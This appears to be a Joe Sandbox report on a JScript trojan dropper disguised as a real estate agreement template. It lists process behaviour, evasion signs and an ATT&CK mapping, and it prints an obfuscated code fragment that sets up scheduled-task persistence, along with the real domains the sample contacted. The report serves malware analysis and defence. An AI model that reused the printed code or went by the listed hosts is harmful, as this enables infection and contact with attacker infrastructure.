    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sxs.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: samcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: samlib.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
    Source: C:\Windows\System32\cscript.exe | Section loaded: version.dll
    Source: C:\Windows\System32\cscript.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\cscript.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\System32\cscript.exe | Section loaded: sxs.dll
    Source: C:\Windows\System32\cscript.exe | Section loaded: jscript.dll
    Source: C:\Windows\System32\cscript.exe | Section loaded: iertutil.dll
    Source: C:\Windows\System32\cscript.exe | Section loaded: amsi.dll
    Source: C:\Windows\System32\cscript.exe | Section loaded: userenv.dll
    Source: C:\Windows\System32\cscript.exe | Section loaded: profapi.dll
    Source: C:\Windows\System32\cscript.exe | Section loaded: wldp.dll
    Source: C:\Windows\System32\cscript.exe | Section loaded: msasn1.dll
    Source: C:\Windows\System32\cscript.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\System32\cscript.exe | Section loaded: rsaenh.dll
    Source: C:\Windows\System32\cscript.exe | Section loaded: cryptbase.dll
    Source: C:\Windows\System32\cscript.exe | Section loaded: msisip.dll
    Source: C:\Windows\System32\cscript.exe | Section loaded: wshext.dll
    Source: C:\Windows\System32\cscript.exe | Section loaded: scrobj.dll
    Source: C:\Windows\System32\cscript.exe | Section loaded: mpr.dll
    Source: C:\Windows\System32\cscript.exe | Section loaded: scrrun.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sxs.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: samcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: samlib.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
    Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
    Source: real estate co ownership agreement template 43632.js | Static file information: File size 1759107 > 1048576

    Data Obfuscation

    Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript;pSzhKh = loGuOn[P(21)](P(33));GyusB = loGuOn[P(21)](P(38));zTrbW = loGuOn[P(21)](P(40));zTrbW[P(27)]();MtQnm = zTrbW[P(12)]("\\");try{gjKLivoL = MtQnm[P(32)](baFycB);}catch(lRjvr){gjKLivoL = false;}if (gjKLivoL == false) {cpQJZO = GyusB[P(12)](pSzhKh[P(19)](P(13)))[P(18)];rDxbXI = 821-(Math[P(37)](821/cpQJZO[P(3)])*cpQJZO[P(3)]);VVJQ = 0;tjuWU = false;for(VepL = new Enumerator(cpQJZO); !VepL[P(10)](); VepL[P(22)]()) {XiTaKV = VepL[P(23)]();if (rDxbXI==VVJQ) tjuWU = XiTaKV;VVJQ++;}if (tjuWU != false) {AjxBDA = tjuWU+"\\"+CFUXD;if(!GyusB[P(34)](AjxBDA)){tMfet = GyusB[P(20)](AjxBDA, 8, true);tMfet[P(0)](aQNTEFP);VVJQ=0;FFnPq=aQNTEFP.length;while(true) {tMfet[P(0)](aQNTEFP);VVJQ=VVJQ+FFnPq;if (VVJQ>47659877) break;}tMfet[P(11)]();tMfet = GyusB[P(29)](AjxBDA);tMfet[P(2)] = aMsgA;SHPrDg = tMfet[P(41)];nLQXcoW = zTrbW[P(25)](0);nLQXcoW[P(35)][P(6)] = true;nLQXcoW[P(35)][P(26)] = false;EVjSJGM = nLQXcoW[P(36)][P(7)](9);EVjSJGM["ID"] = P(28);EVjSJGM[P(14)] = pSzhKh[P(19)](P(39));eNmbDO = nLQXcoW[P(1)][P(7)](0);eNmbDO[P(31)] = P(5);eNmbDO[P(4)] = SHPrDg;eNmbDO[P(9)] = tjuWU;MtQnm[P(24)](baFycB, nLQXcoW, 6, "" , "" , 3);gjKLivoL = MtQnm[P(32)](baFycB);loGuOn[P(16)](27755);gjKLivoL[P(15)](null, 2, 0, "");}}}loGuOn[P(42)]();}ITextStream.Write("650560617905821433189172285812437710244084907636;singlen='*+B?3??.4I+w,E?E8Awb4u';function goldh(bsvgh, jzbnr){return yellow2(bsvgh,jzbnr,yyvt);}developm = 8160;yfkxy='?+tEE?ieceo?Trt) e/+nh?(';bad9='B+(Ow??k?hHj+c?f??)[k++5o?(?'");
    Source: Yara match; File source: real estate co ownership agreement template 43632.js, type: SAMPLE

    Hooking and other Techniques for Hiding and Protection

    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\cscript.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='D:'
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4421
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5524
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6140
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3519
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3216 Thread sleep count: 4421 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3216 Thread sleep count: 5524 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3232 Thread sleep time: -3689348814741908s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4868 Thread sleep count: 6140 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4868 Thread sleep count: 3519 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5456 Thread sleep time: -4611686018427385s >= -30000s
    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
    Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "DEVELO~1.JS"
    Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
    Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
    Gather Victim Identity Information | 12 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 12 Scripting | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Security Software Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
    Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 21 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
    Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Process Injection | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 14 Application Layer Protocol | Traffic Duplication | Data Destruction
    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 12 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
    Behavior Graph ID: 1436909; Sample: real estate co ownership ag...; Startdate: 06/05/2024; Architecture: WINDOWS; Score: 92
    Contacted domains and IPs: weissenbach-pr.de (78.46.3.78, port 443, HETZNER-ASDE, Germany); tennoji-law-uranai.com (153.127.91.146, port 443, SAKURA-ASAKURAInternetIncJP, Japan); naturalanimals.net (91.198.66.211, port 443, NBISERV-ASDE, country unknown); memar98.com (195.28.10.122, port 443, MHOSTIR, country unknown); 2 other IPs or domains
    Sample-level signatures: Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; Yara detected Html Dropper; Sigma detected: WScript or CScript Dropper
    Process chain 1: wscript.exe -> cscript.exe -> powershell.exe and conhost.exe. This powershell.exe connects to tennoji-law-uranai.com (local ports 49711, 49712), naturalanimals.net (local port 49708) and weissenbach-pr.de (local port 49709). Signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage) on wscript.exe; Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes) and Loading BitLocker PowerShell Module on powershell.exe
    Process chain 2: wscript.exe. Signatures: JScript performs obfuscated calls to suspicious functions; Suspicious execution chain found
    Process chain 3: wscript.exe -> cscript.exe -> powershell.exe and conhost.exe. This powershell.exe connects to memar98.com (local port 49710)

    No Antivirus matches
    Source | Detection | Scanner | Label
    weissenbach-pr.de | 11% | Virustotal |
    tennoji-law-uranai.com | 0% | Virustotal |
    memar98.com | 0% | Virustotal |
    naturalanimals.net | 0% | Virustotal |

    Source | Detection | Scanner | Label
    https://tennoji-law-uranai.com/xmlrpc.php | 0% | Avira URL Cloud | safe
    https://weissenbach-pr.de/xmlrpc.php | 100% | Avira URL Cloud | malware
    https://memar98.com/xmlrpc.php | 0% | Avira URL Cloud | safe
    http://raphaeljs.com/analytics.js) | 0% | Avira URL Cloud | safe
    https://naturalanimals.net/xmlrpc.php | 0% | Avira URL Cloud | safe
    https://weissenbach-pr.de/xmlrpc.php | 11% | Virustotal |
    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    weissenbach-pr.de | 78.46.3.78 | true | false | | unknown
    tennoji-law-uranai.com | 153.127.91.146 | true | false | | unknown
    memar98.com | 195.28.10.122 | true | false | | unknown
    naturalanimals.net | 91.198.66.211 | true | false | | unknown
    Name | Malicious | Antivirus Detection | Reputation
    https://memar98.com/xmlrpc.php | false | Avira URL Cloud: safe | unknown
    https://naturalanimals.net/xmlrpc.php | false | Avira URL Cloud: safe | unknown
    https://tennoji-law-uranai.com/xmlrpc.php | false | Avira URL Cloud: safe | unknown
    https://weissenbach-pr.de/xmlrpc.php | false | 11%, Virustotal; Avira URL Cloud: malware | unknown
    Name | Source | Malicious | Antivirus Detection | Reputation
    http://raphaeljs.com/analytics.js) | real estate co ownership agreement template 43632.js | false | Avira URL Cloud: safe | unknown
    https://developer.mozilla.org/en-US/docs/Web/SVG/Attribute/d | real estate co ownership agreement template 43632.js | false | | high
    https://github.com/nhn/tui.chart | real estate co ownership agreement template 43632.js | false | | high
    http://my.opera.com/emoller/blog/2011/12/20/requestanimationframe-for-smart-er-animating | real estate co ownership agreement template 43632.js | false | | high
    https://www.win.tue.nl/~vanwijk/stm.pdf | real estate co ownership agreement template 43632.js | false | | high
    http://stackoverflow.com/questions/1573053/javascript-function-to-convert-color-names-to-hex-codes | real estate co ownership agreement template 43632.js | false | | high
    http://paulirish.com/2011/requestanimationframe-for-smart-animating/ | real estate co ownership agreement template 43632.js | false | | high
    http://www.cs.rit.edu/~ncs/color/t_convert.html | real estate co ownership agreement template 43632.js | false | | high
    https://github.com/miguelmota/base64toblob/blob/master/base64toblob.js | real estate co ownership agreement template 43632.js | false | | high
    https://i-msdn.sec.s-msft.com/dynimg/IC267997.gif | real estate co ownership agreement template 43632.js | false | | high
    https://github.com/nhn/tui.chart/issues/56) | real estate co ownership agreement template 43632.js | false | | high
    http://peltiertech.com/how-excel-calculates-automatic-chart-axis-limits/ | real estate co ownership agreement template 43632.js | false | | high
    http://www.w3schools.com/HTML/html_colornames.asp | real estate co ownership agreement template 43632.js | false | | high
    http://www.w3schools.com/svg/svg_path.asp | real estate co ownership agreement template 43632.js | false | | high
    IP | Domain | Country | ASN | ASN Name | Malicious
    78.46.3.78 | weissenbach-pr.de | Germany | 24940 | HETZNER-ASDE | false
    195.28.10.122 | memar98.com | unknown | 201295 | MHOSTIR | false
    153.127.91.146 | tennoji-law-uranai.com | Japan | 7684 | SAKURA-ASAKURAInternetIncJP | false
    91.198.66.211 | naturalanimals.net | unknown | 43847 | NBISERV-ASDE | false
                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1436909
                              Start date and time:2024-05-06 18:36:58 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 8m 38s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:26
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • GSI enabled (Javascript)
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:real estate co ownership agreement template 43632.js
                              Detection:MAL
                              Classification:mal92.troj.expl.evad.winJS@13/9@4/4
                              EGA Information:Failed
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Found application associated with file extension: .js
                              • Override analysis time to 240s for JS/VBS files not yet terminated
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                              • Report size getting too big, too many NtCreateKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
19:50:30 | Task Scheduler | Run new task: Enterprise Integration path: wscript s>DEVELO~1.JS
19:51:08 | API Interceptor | 298x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
195.28.10.122 | bad.js | Get hash | malicious | Unknown | Browse |
195.28.10.122 | bad.js | Get hash | malicious | Unknown | Browse |
153.127.91.146 | bad.js | Get hash | malicious | Unknown | Browse |
